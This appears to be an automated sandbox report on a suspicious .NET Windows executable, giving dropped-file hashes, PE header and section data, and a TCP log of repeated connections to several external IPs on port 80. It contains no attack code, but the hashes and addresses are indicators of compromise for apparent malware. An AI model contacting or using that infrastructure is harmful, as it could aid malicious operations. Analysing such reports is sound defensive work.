                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdvxieok.f31.psm1

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpkamr5z.y1f.ps1

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyhcxukj.gti.psm1

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1835008
                                                                                                                    Entropy (8bit):4.4659417617299715
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:4IXfpi67eLPU9skLmb0b4SWSPKaJG8nAgejZMMhA2gX4WABl0uNLdwBCswSb7:tXD94SWlLZMM6YFHN+7
                                                                                                                    MD5:412F59F8014CB528A47814CA70FC7582
                                                                                                                    SHA1:419AEEA61D5FD342DB6BACC8341D0F83B77A42EA
                                                                                                                    SHA-256:3A267D965F0AA98F8FC55E6139F12091CCB3ED6DEEB8EED003066C9531306F81
                                                                                                                    SHA-512:EED8115DD1BA9E2C6B64B511467098ED427D497938E4C3243CA90C3414D5CBD6B12D4A05ECC3F0F42A187A4C6E5AE3637647B1BF73CC1AE852DE1A56C0C4F96C
                                                                                                                    Malicious:false
                                                                                                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmF.`.?................................................................................................................................................................................................................................................................................................................................................v.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                    Entropy (8bit):7.8081007571029755
                                                                                                                    TrID:
                                                                                                                    • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                                                                                    • Win64 Executable Console (202006/5) 47.64%
                                                                                                                    • Win64 Executable (generic) (12005/4) 2.83%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.47%
                                                                                                                    • DOS Executable Generic (2002/1) 0.47%
                                                                                                                    File name:NdYuOgHbM9.exe
                                                                                                                    File size:849'277 bytes
                                                                                                                    MD5:664eddacb00d2d58f85cdc2913a1680e
                                                                                                                    SHA1:3dfce1917291ff78513dba84e8ac715700d814d7
                                                                                                                    SHA256:1bb742c209872385c5b456d066fccf141ab2405245953c135b36029a3dbd5bee
                                                                                                                    SHA512:a7c3be40568a5b531b648497be3a4e1abe7408e75a2981575b4858a945c66958af0eb01c4abc4c135f83c120e6f50d6cf148dca1b79b82dc2c9b7185406d4893
                                                                                                                    SSDEEP:12288:Ejwz+S8matk6SosnQq8xMdzq/0P5uxvSpN1HVuX+1Bhkc92Wkdu7n1Gwi:8wCSwk6SotJguxvCN1HVuO1rjFkG18
                                                                                                                    TLSH:E4050122E81D5F9BDD4E00BCC42100C139ADD751F3EAAE6589C6924FEC822D67179DFA
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....f............"...0..`............... ....@...... ....................................`................................

                                                                                                                    File Icon

                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x400000
                                                                                                                    Entrypoint Section:
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows cui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x8ECA66DD [Thu Nov 30 04:34:37 2045 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:4
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:4
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:4
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    dec ebp
                                                                                                                    pop edx
                                                                                                                    nop
                                                                                                                    add byte ptr [ebx], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax+eax], al
                                                                                                                    add byte ptr [eax], al

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a0000xbe4.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x380060x38.text
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x20000x360c70x36200d95f9884977edcba0c93c94f0336aa36False0.532815206408776data6.323643777206914IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc0x3a0000xbe40xc0085fbcfffbbf927e340e26d2f889aa1f1False0.2981770833333333data4.056327325789078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_VERSION0x3a0b80x4a0data0.47297297297297297
                                                                                                                    RT_VERSION0x3a5580x4a0dataEnglishUnited States0.47550675675675674
                                                                                                                    RT_MANIFEST0x3a9f80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                    Possible Origin

                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishUnited States

                                                                                                                    Network Behavior

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    May 8, 2024 14:05:27.131289959 CEST4974280192.168.2.4208.112.85.150
                                                                                                                    May 8, 2024 14:05:27.361671925 CEST8049742208.112.85.150192.168.2.4
                                                                                                                    May 8, 2024 14:05:27.361777067 CEST4974280192.168.2.4208.112.85.150
                                                                                                                    May 8, 2024 14:05:27.363748074 CEST4974280192.168.2.4208.112.85.150
                                                                                                                    May 8, 2024 14:05:27.594613075 CEST8049742208.112.85.150192.168.2.4
                                                                                                                    May 8, 2024 14:05:27.603955030 CEST8049742208.112.85.150192.168.2.4
                                                                                                                    May 8, 2024 14:05:27.604135036 CEST8049742208.112.85.150192.168.2.4
                                                                                                                    May 8, 2024 14:05:27.604199886 CEST4974280192.168.2.4208.112.85.150
                                                                                                                    May 8, 2024 14:05:27.607316971 CEST4974280192.168.2.4208.112.85.150
                                                                                                                    May 8, 2024 14:05:27.837578058 CEST8049742208.112.85.150192.168.2.4
                                                                                                                    May 8, 2024 14:05:43.578200102 CEST4974380192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:43.972284079 CEST804974389.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:43.972523928 CEST4974380192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:43.974493980 CEST4974380192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:44.366486073 CEST804974389.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:44.366837025 CEST804974389.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:44.366847992 CEST804974389.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:44.367006063 CEST4974380192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:45.475784063 CEST4974380192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:46.500904083 CEST4974480192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:46.891552925 CEST804974489.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:46.891881943 CEST4974480192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:46.897799015 CEST4974480192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:47.288376093 CEST804974489.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:47.288647890 CEST804974489.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:47.288718939 CEST804974489.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:47.288770914 CEST4974480192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:48.413242102 CEST4974480192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:49.431668043 CEST4974680192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:49.823205948 CEST804974689.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:49.823340893 CEST4974680192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:49.825542927 CEST4974680192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:50.217385054 CEST804974689.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:50.217628002 CEST804974689.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:50.217639923 CEST804974689.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:50.217649937 CEST804974689.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:50.217670918 CEST804974689.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:50.217753887 CEST804974689.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:50.217854977 CEST804974689.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:50.220896006 CEST4974680192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:51.335222006 CEST4974680192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:52.354090929 CEST4974780192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:52.743139982 CEST804974789.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:52.743237019 CEST4974780192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:52.744904995 CEST4974780192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:53.134212971 CEST804974789.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:53.135462999 CEST804974789.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:53.135473967 CEST804974789.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:53.135582924 CEST4974780192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:53.202002048 CEST4974780192.168.2.489.35.125.17
                                                                                                                    May 8, 2024 14:05:53.590949059 CEST804974789.35.125.17192.168.2.4
                                                                                                                    May 8, 2024 14:05:58.883872986 CEST4974880192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:05:59.066879988 CEST804974838.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:05:59.066968918 CEST4974880192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:05:59.073165894 CEST4974880192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:05:59.256957054 CEST804974838.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:05:59.256972075 CEST804974838.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:05:59.257035017 CEST4974880192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:00.585253000 CEST4974880192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:02.581265926 CEST4974980192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:02.763451099 CEST804974938.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:02.763567924 CEST4974980192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:02.765294075 CEST4974980192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:02.950977087 CEST804974938.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:02.951092005 CEST804974938.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:02.951306105 CEST4974980192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:04.272686005 CEST4974980192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:05.296077013 CEST4975080192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:05.483423948 CEST804975038.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:05.483506918 CEST4975080192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:05.485709906 CEST4975080192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:05.671334028 CEST804975038.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:05.671426058 CEST4975080192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:05.671576023 CEST804975038.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:05.856548071 CEST804975038.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:05.857281923 CEST804975038.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:05.857295036 CEST804975038.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:05.857348919 CEST4975080192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:06.991415024 CEST4975080192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:08.014336109 CEST4975180192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:08.198231936 CEST804975138.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:08.198448896 CEST4975180192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:08.200114965 CEST4975180192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:08.383965015 CEST804975138.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:08.383979082 CEST804975138.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:08.384125948 CEST4975180192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:08.386475086 CEST4975180192.168.2.438.63.111.149
                                                                                                                    May 8, 2024 14:06:08.569036007 CEST804975138.63.111.149192.168.2.4
                                                                                                                    May 8, 2024 14:06:14.263341904 CEST4975280192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:14.584458113 CEST8049752116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:14.584558964 CEST4975280192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:14.586652994 CEST4975280192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:14.909120083 CEST8049752116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:14.917412043 CEST8049752116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:14.917424917 CEST8049752116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:14.917495966 CEST4975280192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:16.100709915 CEST4975280192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:17.119580030 CEST4975380192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:17.440216064 CEST8049753116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:17.440293074 CEST4975380192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:17.442826986 CEST4975380192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:17.763036966 CEST8049753116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:17.769128084 CEST8049753116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:17.769150972 CEST8049753116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:17.769212961 CEST4975380192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:19.911876917 CEST4975380192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:20.918384075 CEST4975480192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:21.243094921 CEST8049754116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:21.243180037 CEST4975480192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:21.246359110 CEST4975480192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:21.570135117 CEST8049754116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:21.592740059 CEST8049754116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:21.592751980 CEST8049754116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:21.592849970 CEST4975480192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:22.824122906 CEST4975480192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:23.838316917 CEST4975580192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:24.165585041 CEST8049755116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:24.165662050 CEST4975580192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:24.167381048 CEST4975580192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:24.491072893 CEST8049755116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:24.496562958 CEST8049755116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:24.496575117 CEST8049755116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:24.496710062 CEST4975580192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:24.504414082 CEST4975580192.168.2.4116.203.164.244
                                                                                                                    May 8, 2024 14:06:24.828109980 CEST8049755116.203.164.244192.168.2.4
                                                                                                                    May 8, 2024 14:06:29.730851889 CEST4975680192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:30.045020103 CEST804975691.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:30.045955896 CEST4975680192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:30.047672987 CEST4975680192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:30.359081984 CEST804975691.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:30.359097004 CEST804975691.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:30.359169960 CEST4975680192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:31.554497004 CEST4975680192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:32.573493958 CEST4975780192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:32.884403944 CEST804975791.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:32.884484053 CEST4975780192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:32.886626005 CEST4975780192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:33.202363968 CEST804975791.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:33.202378988 CEST804975791.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:33.202425957 CEST4975780192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:34.397712946 CEST4975780192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:35.416501999 CEST4975880192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:35.727746964 CEST804975891.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:35.727900982 CEST4975880192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:35.730226994 CEST4975880192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:36.042536020 CEST804975891.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:36.042552948 CEST804975891.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:36.043148041 CEST804975891.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:36.043159008 CEST804975891.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:36.043277979 CEST4975880192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:37.242492914 CEST4975880192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:38.263905048 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:38.574817896 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:38.574937105 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.265795946 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.618412018 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.625897884 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.625910044 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.625921011 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.625935078 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.626003027 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.626010895 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.626010895 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.626200914 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.626213074 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.626224041 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.626235008 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.626245022 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.626274109 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.626328945 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.626364946 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.936451912 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936474085 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936486006 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936500072 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936511040 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.936537027 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936548948 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936553955 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.936561108 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936573029 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936589956 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.936603069 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936616898 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936640024 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.936737061 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.939698935 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:40.251949072 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:45.201514006 CEST4976080192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:45.401309013 CEST8049760203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:45.401375055 CEST4976080192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:45.403407097 CEST4976080192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:45.603169918 CEST8049760203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:45.613395929 CEST8049760203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:45.613509893 CEST8049760203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:45.613550901 CEST4976080192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:46.916640043 CEST4976080192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:47.938968897 CEST4976180192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:48.136976004 CEST8049761203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:48.137207985 CEST4976180192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:48.138953924 CEST4976180192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:48.335875988 CEST8049761203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:48.345973969 CEST8049761203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:48.346072912 CEST8049761203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:48.348731041 CEST4976180192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:49.647608042 CEST4976180192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:50.676512957 CEST4976280192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:50.875716925 CEST8049762203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:50.878827095 CEST4976280192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:50.878827095 CEST4976280192.168.2.4203.161.46.103
